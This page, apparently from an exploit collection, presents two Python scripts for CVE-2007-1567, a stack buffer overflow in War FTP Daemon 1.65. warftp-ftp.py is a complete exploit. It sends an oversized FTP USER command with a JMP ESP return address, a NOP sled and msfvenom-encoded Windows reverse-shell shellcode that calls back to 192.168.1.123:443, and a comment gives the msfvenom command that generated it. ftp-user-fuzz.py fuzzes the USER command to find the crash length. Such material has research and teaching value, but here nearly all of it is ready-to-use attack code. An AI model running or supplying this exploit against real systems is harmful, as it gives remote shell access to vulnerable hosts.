CVE-2007-1567_War_FTP_Daemon_1.65堆棧緩衝區溢出漏洞

# CVE-2007-1567 War FTP Daemon 1.65堆棧緩衝區溢出漏洞
==warftp-ftp.py==

#!/usr/bin/python

import socket

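# Stack layout used by this PoC (offsets come from the original write-up and
# should be re-confirmed on the target with a cyclic pattern before use):
#   485 bytes of filler reach the saved return address, 4 bytes overwrite it
#   with a JMP ESP gadget, a 20-byte NOP sled absorbs small ESP drift, then
#   the payload follows.  Trailing "C" padding preserves the original
#   total length.
RET_OFFSET = 485

# 774699BF   FFE4   JMP ESP   (packed little-endian below).
# The gadget lives in a module of the original test VM; the address is tied
# to that Windows build/patch level and must be re-located anywhere else.
JMP_ESP = b"\xbf\x99\x46\x77"

NOP_SLED = b"\x90" * 20

# Length the trailing padding is computed from (5500 - 485 - 4), exactly as
# in the original PoC.  Note the sled and shellcode are appended on top of
# that padding, so the USER argument is actually longer than 5500 bytes.
TOTAL_LEN = 5500

# Bytes the USER parser terminates or corrupts on; the return address and
# the encoded payload must not contain any of them.
BAD_CHARS = b"\x00\x0a\x0d"

# Generated with the command below.  The listener address is baked into the
# encoded blob, so regenerate it for your own LHOST/LPORT; editing the
# target host in main() does not change where the shell connects back to.
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.123 LPORT=443 -f c \
#   EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -a x86 --platform windows
shellcode = (b"\xd9\xed\xba\xda\x93\x0e\xa1\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
b"\x52\x31\x55\x17\x83\xc5\x04\x03\x8f\x80\xec\x54\xd3\x4f\x72"
b"\x96\x2b\x90\x13\x1e\xce\xa1\x13\x44\x9b\x92\xa3\x0e\xc9\x1e"
b"\x4f\x42\xf9\x95\x3d\x4b\x0e\x1d\x8b\xad\x21\x9e\xa0\x8e\x20"
b"\x1c\xbb\xc2\x82\x1d\x74\x17\xc3\x5a\x69\xda\x91\x33\xe5\x49"
b"\x05\x37\xb3\x51\xae\x0b\x55\xd2\x53\xdb\x54\xf3\xc2\x57\x0f"
b"\xd3\xe5\xb4\x3b\x5a\xfd\xd9\x06\x14\x76\x29\xfc\xa7\x5e\x63"
b"\xfd\x04\x9f\x4b\x0c\x54\xd8\x6c\xef\x23\x10\x8f\x92\x33\xe7"
b"\xed\x48\xb1\xf3\x56\x1a\x61\xdf\x67\xcf\xf4\x94\x64\xa4\x73"
b"\xf2\x68\x3b\x57\x89\x95\xb0\x56\x5d\x1c\x82\x7c\x79\x44\x50"
b"\x1c\xd8\x20\x37\x21\x3a\x8b\xe8\x87\x31\x26\xfc\xb5\x18\x2f"
b"\x31\xf4\xa2\xaf\x5d\x8f\xd1\x9d\xc2\x3b\x7d\xae\x8b\xe5\x7a"
b"\xd1\xa1\x52\x14\x2c\x4a\xa3\x3d\xeb\x1e\xf3\x55\xda\x1e\x98"
b"\xa5\xe3\xca\x0f\xf5\x4b\xa5\xef\xa5\x2b\x15\x98\xaf\xa3\x4a"
b"\xb8\xd0\x69\xe3\x53\x2b\xfa\xcc\x0c\x32\x81\xa4\x4e\x34\x74"
b"\x8e\xc6\xd2\x1c\xe0\x8e\x4d\x89\x99\x8a\x05\x28\x65\x01\x60"
b"\x6a\xed\xa6\x95\x25\x06\xc2\x85\xd2\xe6\x99\xf7\x75\xf8\x37"
b"\x9f\x1a\x6b\xdc\x5f\x54\x90\x4b\x08\x31\x66\x82\xdc\xaf\xd1"
b"\x3c\xc2\x2d\x87\x07\x46\xea\x74\x89\x47\x7f\xc0\xad\x57\xb9"
b"\xc9\xe9\x03\x15\x9c\xa7\xfd\xd3\x76\x06\x57\x8a\x25\xc0\x3f"
b"\x4b\x06\xd3\x39\x54\x43\xa5\xa5\xe5\x3a\xf0\xda\xca\xaa\xf4"
b"\xa3\x36\x4b\xfa\x7e\xf3\x6b\x19\xaa\x0e\x04\x84\x3f\xb3\x49"
b"\x37\xea\xf0\x77\xb4\x1e\x89\x83\xa4\x6b\x8c\xc8\x62\x80\xfc"
b"\x41\x07\xa6\x53\x61\x02")


def check_bad_chars(data, bad_chars=BAD_CHARS):
    """Raise ValueError if *data* contains any byte from *bad_chars*.

    Run on the return address and the payload before sending: a single bad
    byte silently truncates or corrupts the buffer and turns a working
    exploit into an unexplained crash.
    """
    for bad in bad_chars:
        if bad in data:
            raise ValueError("payload contains bad character 0x%02x" % bad)


def build_exploit_buffer():
    """Return the USER argument (bytes) that redirects EIP into the sled.

    Layout: filler | JMP ESP | NOP sled | shellcode | trailing padding.
    The byte arrangement is kept identical to the original PoC because it
    is the layout the exploit was tested with; only the bad-character
    check is new.
    """
    check_bad_chars(JMP_ESP)
    check_bad_chars(shellcode)
    padding = b"C" * (TOTAL_LEN - RET_OFFSET - len(JMP_ESP))
    return b"A" * RET_OFFSET + JMP_ESP + NOP_SLED + shellcode + padding


def send_exploit(host, port=21, timeout=10.0):
    """Deliver the overflow in an FTP USER command.

    Returns True when the buffer was sent, False if the connection or the
    send failed.  A socket timeout is set so a crashed daemon or a hijacked
    thread cannot leave us blocked in recv() forever; an error on the
    post-send recv() is the expected outcome (the process died or the
    reverse shell took over) and is not treated as a failure.
    """
    payload = build_exploit_buffer()
    try:
        sock = socket.create_connection((host, port), timeout=timeout)
    except OSError as exc:
        print("Could not connect to FTP! (%s)" % exc)
        return False
    with sock:
        try:
            sock.recv(1024)  # banner
            print("\nSending evil buffer...")
            # sendall: a plain send() may deliver only part of a ~5.8 KB
            # buffer, which would leave EIP pointing at filler.
            sock.sendall(b"USER " + payload + b"\r\n")
        except OSError as exc:
            print("Failed to deliver buffer: %s" % exc)
            return False
        try:
            sock.recv(1024)
        except OSError:
            # Reset or timeout here is normal once the overflow has fired.
            pass
    print("\nDone!.")
    return True


def main(argv=None):
    """CLI entry point: warftp-ftp.py [target_host] [port] (defaults keep
    the original hard-coded target)."""
    import sys

    args = sys.argv[1:] if argv is None else argv
    host = args[0] if args else "192.168.1.131"
    port = int(args[1]) if len(args) > 1 else 21
    return 0 if send_exploit(host, port) else 1


if __name__ == "__main__":
    raise SystemExit(main())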
	

==ftp-user-fuzz.py==

#!/usr/bin/python

import socket

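def build_fuzz_strings(count=30, start=100, step=200):
    """Return the USER arguments to try, shortest first.

    Reproduces the original schedule: a 1-byte probe, then ``start`` bytes
    growing by ``step`` until ``count`` strings exist (1, 100, 300, ...,
    5700 with the defaults).  Only the length matters for locating a stack
    overflow, so a constant filler byte is used.
    """
    strings = [b"A"]
    length = start
    while len(strings) < count:
        strings.append(b"A" * length)
        length += step
    return strings


def fuzz_user(host, port=21, strings=None, timeout=5.0):
    """Send each candidate as an FTP USER argument on a fresh connection.

    Stops at the first socket error (refused, reset or timeout) and returns
    the length that was being sent; the previously accepted length is also
    printed, because when the daemon dies without answering, the error
    surfaces on the *next* connect() rather than on the crashing request.
    Returns None if every string was accepted.  The timeout keeps a
    silently hung service from stalling the run indefinitely.
    """
    if strings is None:
        strings = build_fuzz_strings()
    last_ok = None
    for candidate in strings:
        print("Fuzzing USER with %s bytes" % len(candidate))
        try:
            with socket.create_connection((host, port), timeout=timeout) as s:
                s.recv(1024)  # banner
                s.sendall(b"USER " + candidate + b"\r\n")
                s.recv(1024)
                s.sendall(b"QUIT\r\n")
        except OSError as exc:
            print("Service stopped responding while sending %s bytes "
                  "(last accepted length: %s): %s" % (len(candidate), last_ok, exc))
            return len(candidate)
        last_ok = len(candidate)
    return None


def main(argv=None):
    """CLI entry point: ftp-user-fuzz.py [target_host] [port] (defaults keep
    the original hard-coded target)."""
    import sys

    args = sys.argv[1:] if argv is None else argv
    host = args[0] if args else "192.168.1.131"
    port = int(args[1]) if len(args) > 1 else 21
    crashed_at = fuzz_user(host, port)
    return 0 if crashed_at is not None else 1


if __name__ == "__main__":
    raise SystemExit(main())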

